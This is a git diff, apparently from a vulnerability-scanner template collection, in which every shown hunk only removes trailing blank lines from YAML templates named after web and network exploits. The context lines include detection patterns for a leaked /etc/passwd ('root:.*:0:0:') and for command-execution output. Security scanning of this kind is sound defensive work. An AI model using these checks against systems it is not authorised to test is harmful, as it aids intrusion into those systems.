http/vulnerabilities/other/mirai-unknown-rce.yaml | 2 -- http/vulnerabilities/other/mpsec-lfi.yaml | 2 -- http/vulnerabilities/other/myucms-lfr.yaml | 2 -- http/vulnerabilities/other/natshell-path-traversal.yaml | 2 -- http/vulnerabilities/other/natshell-rce.yaml | 2 -- http/vulnerabilities/other/netgear-router-auth-bypass.yaml | 2 -- http/vulnerabilities/other/netgear-router-exposure.yaml | 2 -- .../other/netgear-wac124-router-auth-bypass.yaml | 2 -- http/vulnerabilities/other/netis-info-leak.yaml | 2 -- http/vulnerabilities/other/nextjs-redirect.yaml | 2 -- .../other/nginx-merge-slashes-path-traversal.yaml | 2 -- http/vulnerabilities/other/nginx-module-vts-xss.yaml | 2 -- http/vulnerabilities/other/ns-asg-file-read.yaml | 2 -- http/vulnerabilities/other/nuuo-file-inclusion.yaml | 2 -- http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml | 2 -- http/vulnerabilities/other/odoo-cms-redirect.yaml | 2 -- http/vulnerabilities/other/oliver-library-lfi.yaml | 2 -- http/vulnerabilities/other/onlinefarm-management-xss.yaml | 2 -- http/vulnerabilities/other/opencti-lfi.yaml | 2 -- http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml | 2 -- http/vulnerabilities/other/opensis-lfi.yaml | 2 -- http/vulnerabilities/other/opensns-rce.yaml | 2 -- http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml | 2 -- http/vulnerabilities/other/oracle-fatwire-lfi.yaml | 2 -- http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml | 2 -- http/vulnerabilities/other/otobo-open-redirect.yaml | 2 -- http/vulnerabilities/other/pacsone-server-lfi.yaml | 2 -- http/vulnerabilities/other/parallels-hsphere-xss.yaml | 2 -- http/vulnerabilities/other/parentlink-xss.yaml | 2 -- .../vulnerabilities/other/pbootcms-database-file-download.yaml | 2 -- http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml | 2 -- http/vulnerabilities/other/php-timeclock-xss.yaml | 2 -- http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml | 2 -- http/vulnerabilities/other/phpok-sqli.yaml | 2 -- http/vulnerabilities/other/phpwiki-lfi.yaml | 2 -- http/vulnerabilities/other/pmb-directory-traversal.yaml | 2 -- http/vulnerabilities/other/pmb-local-file-disclosure.yaml | 2 -- http/vulnerabilities/other/pollbot-redirect.yaml | 2 -- http/vulnerabilities/other/powercreator-cms-rce.yaml | 2 -- http/vulnerabilities/other/processmaker-lfi.yaml | 2 -- http/vulnerabilities/other/qcubed-xss.yaml | 2 -- .../other/qi-anxin-netkang-next-generation-firewall-rce.yaml | 2 -- http/vulnerabilities/other/qihang-media-disclosure.yaml | 2 -- http/vulnerabilities/other/qihang-media-lfi.yaml | 2 -- http/vulnerabilities/other/rconfig-file-upload.yaml | 2 -- http/vulnerabilities/other/reddittop-rss-xss.yaml | 2 -- http/vulnerabilities/other/rockmongo-xss.yaml | 2 -- http/vulnerabilities/other/sap-redirect.yaml | 2 -- http/vulnerabilities/other/sar2html-rce.yaml | 2 -- http/vulnerabilities/other/seacms-sqli.yaml | 2 -- http/vulnerabilities/other/seowon-router-rce.yaml | 2 -- http/vulnerabilities/other/sick-beard-xss.yaml | 2 -- http/vulnerabilities/other/siteminder-dom-xss.yaml | 2 -- http/vulnerabilities/other/sl-studio-lfi.yaml | 2 -- http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml | 2 -- http/vulnerabilities/other/solar-log-authbypass.yaml | 2 -- http/vulnerabilities/other/solarview-compact-xss.yaml | 2 -- http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml | 2 -- http/vulnerabilities/other/steve-xss.yaml | 2 -- http/vulnerabilities/other/surrealtodo-lfi.yaml | 2 -- http/vulnerabilities/other/symantec-messaging-gateway.yaml | 2 -- http/vulnerabilities/other/tamronos-rce.yaml | 2 -- http/vulnerabilities/other/thinkific-redirect.yaml | 2 -- http/vulnerabilities/other/thruk-xss.yaml | 2 -- http/vulnerabilities/other/tikiwiki-reflected-xss.yaml | 2 -- http/vulnerabilities/other/tpshop-directory-traversal.yaml | 2 -- http/vulnerabilities/other/turbocrm-xss.yaml | 2 -- http/vulnerabilities/other/ueditor-file-upload.yaml | 2 -- http/vulnerabilities/other/umbraco-base-ssrf.yaml | 2 -- http/vulnerabilities/other/unauth-hoteldruid-panel.yaml | 2 -- http/vulnerabilities/other/unauth-spark-api.yaml | 2 -- http/vulnerabilities/other/unifi-network-log4j-rce.yaml | 2 -- http/vulnerabilities/other/vanguard-post-xss.yaml | 2 -- http/vulnerabilities/other/viewlinc-crlf-injection.yaml | 2 -- http/vulnerabilities/other/vpms-auth-bypass.yaml | 2 -- http/vulnerabilities/other/wapples-firewall-lfi.yaml | 2 -- .../other/watchguard-credentials-disclosure.yaml | 2 -- http/vulnerabilities/other/webui-rce.yaml | 2 -- http/vulnerabilities/other/wems-manager-xss.yaml | 2 -- http/vulnerabilities/other/wuzhicms-sqli.yaml | 2 -- http/vulnerabilities/other/xdcms-sqli.yaml | 2 -- http/vulnerabilities/other/xerox-efi-lfi.yaml | 2 -- http/vulnerabilities/other/yapi-rce.yaml | 2 -- http/vulnerabilities/other/yarn-resourcemanager-rce.yaml | 2 -- http/vulnerabilities/other/yeswiki-sql.yaml | 2 -- http/vulnerabilities/other/yeswiki-stored-xss.yaml | 2 -- http/vulnerabilities/other/yeswiki-xss.yaml | 2 -- http/vulnerabilities/other/yishaadmin-lfi.yaml | 2 -- http/vulnerabilities/other/zcms-v3-sqli.yaml | 2 -- http/vulnerabilities/other/zimbra-preauth-ssrf.yaml | 2 -- http/vulnerabilities/other/zms-auth-bypass.yaml | 2 -- http/vulnerabilities/other/zms-sqli.yaml | 2 -- http/vulnerabilities/other/zzcms-xss.yaml | 2 -- http/vulnerabilities/portainer-init-deploy.yaml | 2 -- http/vulnerabilities/rails/rails6-xss.yaml | 2 -- http/vulnerabilities/rocketchat/unauth-message-read.yaml | 1 - http/vulnerabilities/royalevent/royalevent-management-xss.yaml | 2 -- http/vulnerabilities/royalevent/royalevent-stored-xss.yaml | 2 -- http/vulnerabilities/ruijie-eg-login-rce.yaml | 2 -- http/vulnerabilities/ruijie/ruijie-eg-rce.yaml | 2 -- http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml | 2 -- http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml | 2 -- http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml | 2 -- http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml | 2 -- http/vulnerabilities/sangfor/sangfor-ba-rce.yaml | 2 -- http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml | 2 -- http/vulnerabilities/sangfor/sangfor-edr-rce.yaml | 2 -- http/vulnerabilities/seeyon/wooyun-2015-148227.yaml | 2 -- http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml | 2 -- http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml | 2 -- http/vulnerabilities/springboot/springboot-h2-db-rce.yaml | 2 -- http/vulnerabilities/springboot/springboot-log4j-rce.yaml | 2 -- http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml | 2 -- http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml | 2 -- .../squirrelmail/squirrelmail-vkeyboard-xss.yaml | 2 -- .../thinkcmf/thinkcmf-arbitrary-code-execution.yaml | 2 -- http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml | 2 -- http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml | 2 -- http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml | 2 -- http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml | 2 -- http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml | 2 -- http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml | 2 -- .../thinkphp/thinkphp-509-information-disclosure.yaml | 2 -- http/vulnerabilities/tongda/tongda-path-traversal.yaml | 2 -- http/vulnerabilities/videoxpert-lfi.yaml | 2 -- http/vulnerabilities/vmware/vmware-hcx-log4j.yaml | 2 -- http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml | 2 -- http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml | 2 -- http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml | 2 -- http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml | 2 -- .../weaver/ecology/ecology-arbitrary-file-upload.yaml | 2 -- .../ecology/ecology-filedownload-directory-traversal.yaml | 2 -- .../ecology/ecology-springframework-directory-traversal.yaml | 2 -- .../weaver/ecology/ecology-syncuserinfo-sqli.yaml | 2 -- http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml | 2 -- http/vulnerabilities/weaver/oa-v9-uploads-file.yaml | 2 -- http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml | 2 -- .../wordpress/3dprint-arbitrary-file-upload.yaml | 2 -- http/vulnerabilities/wordpress/404-to-301-xss.yaml | 2 -- http/vulnerabilities/wordpress/ad-widget-lfi.yaml | 2 -- .../vulnerabilities/wordpress/advanced-access-manager-lfi.yaml | 2 -- http/vulnerabilities/wordpress/age-gate-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/age-gate-xss.yaml | 2 -- http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml | 2 -- http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml | 2 -- http/vulnerabilities/wordpress/analytify-plugin-xss.yaml | 2 -- http/vulnerabilities/wordpress/aspose-file-download.yaml | 2 -- http/vulnerabilities/wordpress/aspose-ie-file-download.yaml | 2 -- http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml | 2 -- http/vulnerabilities/wordpress/aspose-words-file-download.yaml | 2 -- .../wordpress/attitude-theme-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml | 2 -- http/vulnerabilities/wordpress/brandfolder-lfi.yaml | 2 -- http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/calameo-publications-xss.yaml | 2 -- .../vulnerabilities/wordpress/checkout-fields-manager-xss.yaml | 2 -- http/vulnerabilities/wordpress/cherry-file-download.yaml | 2 -- http/vulnerabilities/wordpress/cherry-lfi.yaml | 2 -- http/vulnerabilities/wordpress/church-admin-lfi.yaml | 2 -- http/vulnerabilities/wordpress/churchope-lfi.yaml | 2 -- http/vulnerabilities/wordpress/clearfy-cache-xss.yaml | 2 -- http/vulnerabilities/wordpress/curcy-xss.yaml | 2 -- http/vulnerabilities/wordpress/diarise-theme-lfi.yaml | 2 -- .../wordpress/eatery-restaurant-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml | 2 -- .../vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml | 2 -- http/vulnerabilities/wordpress/hb-audio-lfi.yaml | 2 -- http/vulnerabilities/wordpress/health-check-lfi.yaml | 2 -- http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml | 2 -- http/vulnerabilities/wordpress/issuu-panel-lfi.yaml | 2 -- http/vulnerabilities/wordpress/members-list-xss.yaml | 2 -- http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml | 2 -- http/vulnerabilities/wordpress/mthemeunus-lfi.yaml | 2 -- http/vulnerabilities/wordpress/music-store-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/my-chatbot-xss.yaml | 2 -- http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml | 2 -- http/vulnerabilities/wordpress/new-user-approve-xss.yaml | 2 -- http/vulnerabilities/wordpress/newsletter-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/pieregister-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/sassy-social-share.yaml | 2 -- http/vulnerabilities/wordpress/seo-redirection-xss.yaml | 2 -- http/vulnerabilities/wordpress/shortcode-lfi.yaml | 2 -- .../wordpress/shortpixel-image-optimizer-xss.yaml | 2 -- .../wordpress/ultimatemember-open-redirect.yaml | 2 -- .../wordpress/weekender-newspaper-open-redirect.yaml | 2 -- .../wordpress/woocommerce-pdf-invoices-xss.yaml | 2 -- .../wordpress/wordpress-accessible-wpconfig.yaml | 2 -- .../wordpress/wordpress-woocommerce-listing.yaml | 2 -- http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml | 2 -- .../wordpress/wordpress-wordfence-waf-bypass-xss.yaml | 2 -- http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml | 2 -- http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-adaptive-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-all-export-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-ambience-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-finder-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-flagem-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml | 2 -- .../vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/wp-insert-php-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-javospot-lfi.yaml | 2 -- http/vulnerabilities/wordpress/wp-knews-xss.yaml | 2 -- .../wordpress/wp-memphis-documents-library-lfi.yaml | 2 -- http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml | 2 -- http/vulnerabilities/wordpress/wp-nextgen-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml | 2 -- http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/wp-securimage-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-security-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml | 2 -- http/vulnerabilities/wordpress/wp-slideshow-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-socialfit-xss.yaml | 2 -- http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml | 2 -- http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml | 2 -- http/vulnerabilities/wordpress/wp-tutor-lfi.yaml | 2 -- http/vulnerabilities/wordpress/wp-vault-lfi.yaml | 2 -- .../wordpress/wp-woocommerce-email-verification.yaml | 2 -- .../wordpress/wp-woocommerce-file-download.yaml | 2 -- .../wordpress/wp-woocommerce-pdf-invoice-listing.yaml | 2 -- http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml | 2 -- http/vulnerabilities/wordpress/wptouch-open-redirect.yaml | 2 -- http/vulnerabilities/wordpress/wptouch-xss.yaml | 2 -- http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml | 2 -- http/vulnerabilities/yonyou/wooyun-path-traversal.yaml | 2 -- http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml | 2 -- http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 2 -- network/backdoor/backdoored-zte.yaml | 2 -- network/cisco-smi-exposure.yaml | 2 -- network/clickhouse-unauth.yaml | 2 -- network/cves/2001/CVE-2001-1473.yaml | 2 -- network/cves/2015/CVE-2015-3306.yaml | 2 -- network/cves/2016/CVE-2016-2004.yaml | 2 -- network/cves/2017/CVE-2017-3881.yaml | 2 -- network/cves/2018/CVE-2018-2628.yaml | 2 -- network/cves/2018/CVE-2018-2893.yaml | 2 -- network/cves/2020/CVE-2020-7247.yaml | 2 -- network/cves/2021/CVE-2021-44521.yaml | 2 -- network/cves/2022/CVE-2022-0543.yaml | 3 --- network/cves/2022/CVE-2022-31793.yaml | 2 -- network/detect-addpac-voip-gateway.yaml | 2 -- network/detect-jabber-xmpp.yaml | 2 -- network/detection/dotnet-remoting-service-detect.yaml | 2 -- network/detection/esmtp-detect.yaml | 2 -- network/detection/gopher-detect.yaml | 2 -- network/detection/ibm-d2b-database-server.yaml | 2 -- network/detection/imap-detect.yaml | 2 -- network/detection/iplanet-imap-detect.yaml | 2 -- network/detection/java-rmi-detect.yaml | 2 -- network/detection/mikrotik-routeros-api.yaml | 2 -- network/detection/mongodb-detect.yaml | 2 -- network/detection/mysql-detect.yaml | 2 -- network/detection/openssh-detect.yaml | 2 -- network/detection/pgsql-detect.yaml | 2 -- network/detection/pop3-detect.yaml | 2 -- network/detection/rdp-detect.yaml | 2 -- network/detection/redis-detect.yaml | 2 -- network/detection/rpcbind-portmapper-detect.yaml | 2 -- network/detection/rsyncd-service-detect.yaml | 2 -- network/detection/rtsp-detect.yaml | 2 -- network/detection/samba-detect.yaml | 1 - network/detection/vnc-service-detect.yaml | 2 -- network/enumeration/mongodb-info-enum.yaml | 2 -- network/exposed-adb.yaml | 2 -- network/exposed-redis.yaml | 3 --- network/exposed-zookeeper.yaml | 2 -- network/ftp-weak-credentials.yaml | 2 -- network/mongodb-unauth.yaml | 2 -- network/mysql-native-password.yaml | 2 -- network/sap-router-info-leak.yaml | 2 -- network/tidb-native-password.yaml | 2 -- network/tidb-unauth.yaml | 2 -- network/vsftpd-backdoor.yaml | 2 -- network/vulnerabilities/clockwatch-enterprise-rce.yaml | 2 -- 4032 files changed, 7982 deletions(-) diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml index 4f6bfe8fda..f6859c6b29 100644 --- a/http/cnvd/2021/CNVD-2021-09650.yaml +++ b/http/cnvd/2021/CNVD-2021-09650.yaml @@ -32,5 +32,3 @@ http: name: http words: - "http" - - diff --git a/http/cnvd/2021/CNVD-2021-10543.yaml b/http/cnvd/2021/CNVD-2021-10543.yaml index 0542fab537..c41bd8c499 100644 --- a/http/cnvd/2021/CNVD-2021-10543.yaml +++ b/http/cnvd/2021/CNVD-2021-10543.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cnvd/2021/CNVD-2021-14536.yaml b/http/cnvd/2021/CNVD-2021-14536.yaml index e8f3b074cf..6590860963 100644 --- a/http/cnvd/2021/CNVD-2021-14536.yaml +++ b/http/cnvd/2021/CNVD-2021-14536.yaml @@ -42,5 +42,3 @@ http: group: 1 regex: - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":' - - diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml index 81757bc188..f9e2dffec5 100644 --- a/http/cnvd/2021/CNVD-2021-15822.yaml +++ b/http/cnvd/2021/CNVD-2021-15822.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index 2b2c31b292..d085e9ce49 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cnvd/2021/CNVD-2021-17369.yaml b/http/cnvd/2021/CNVD-2021-17369.yaml index 101b2f6778..703ccbc50c 100644 --- a/http/cnvd/2021/CNVD-2021-17369.yaml +++ b/http/cnvd/2021/CNVD-2021-17369.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cnvd/2021/CNVD-2021-26422.yaml b/http/cnvd/2021/CNVD-2021-26422.yaml index 09b7fe67d9..ef839cda21 100644 --- a/http/cnvd/2021/CNVD-2021-26422.yaml +++ b/http/cnvd/2021/CNVD-2021-26422.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cnvd/2021/CNVD-2021-28277.yaml b/http/cnvd/2021/CNVD-2021-28277.yaml index f0142d7e87..d0418eaef6 100644 --- a/http/cnvd/2021/CNVD-2021-28277.yaml +++ b/http/cnvd/2021/CNVD-2021-28277.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml index 9399b1f3dd..a8c42f9888 100644 --- a/http/cnvd/2021/CNVD-2021-30167.yaml +++ b/http/cnvd/2021/CNVD-2021-30167.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml index 2cea6e3752..554a8c74b6 100644 --- a/http/cnvd/2021/CNVD-2021-49104.yaml +++ b/http/cnvd/2021/CNVD-2021-49104.yaml @@ -46,5 +46,3 @@ http: - type: status status: - 200 - - diff --git a/http/cnvd/2022/CNVD-2022-03672.yaml b/http/cnvd/2022/CNVD-2022-03672.yaml index 057eba79fc..81f3ababb6 100644 --- a/http/cnvd/2022/CNVD-2022-03672.yaml +++ b/http/cnvd/2022/CNVD-2022-03672.yaml @@ -47,5 +47,3 @@ http: - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and - - diff --git a/http/cnvd/2022/CNVD-2022-42853.yaml b/http/cnvd/2022/CNVD-2022-42853.yaml index c9ab69cc09..f094d24bac 100644 --- a/http/cnvd/2022/CNVD-2022-42853.yaml +++ b/http/cnvd/2022/CNVD-2022-42853.yaml @@ -38,5 +38,3 @@ http: part: body words: - 'c8c605999f3d8352d7bb792cf3fdb25' - - diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 747ad437da..362743df8f 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -33,5 +33,3 @@ http: part: body words: - "_vti_bin/shtml.dll" - - diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 0c18ccc916..5db70c3d4d 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -47,5 +47,3 @@ http: part: header words: - "text/html" - - diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 18fd37356c..76318a710c 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -39,5 +39,3 @@ http: part: header words: - "text/html" - - diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 60b1312d1c..ab021aa862 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -33,5 +33,3 @@ http: regex: - '(\"" - - diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 3b9d4b4954..a6782a8f05 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -37,5 +37,3 @@ http: part: header words: - text/html - - diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index b9ba40596b..12eac06b68 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 86ec12cfc2..37078a7418 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -38,5 +38,3 @@ http: part: header words: - "text/html" - - diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index b34517231c..9ec9e40713 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index d73fbeffeb..31e15e5651 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 43b54bc045..1ca72229dc 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -41,5 +41,3 @@ http: part: header words: - "text/html" - - diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index b5ef74ed93..ca6101e405 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index f3bd59bec6..38db66918d 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -40,6 +40,3 @@ http: - type: status status: - 200 - - - diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index a0a580c3c1..f9518c8659 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -39,5 +39,3 @@ http: words: - "text/html" part: header - - diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index e9d33208ab..b236309e78 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 33fe0fce57..40c1a5e8e4 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 375899157a..94fcea035c 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 704e82270c..4a67130c8a 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index fdf7a58ecb..81e9ea2ee5 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 1d72375491..a1f5eda655 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index cdff49137b..68b4919f05 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 33011ccb0f..da9a1824d7 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -44,5 +44,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index fc305b09f1..15d13e5608 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 92336fe1ce..7939deffd8 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 500 - - diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 491359f575..277a638723 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -29,5 +29,3 @@ http: part: body regex: - "root:.*:0:0:" - - diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 1edf5c09e9..d5973114b7 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 009b29959a..484fb306b4 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -40,5 +40,3 @@ http: - type: regex regex: - "root:.*:0:0:" - - diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 0e8c8e029a..aaaa086510 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2009/CVE-2009-1558.yaml 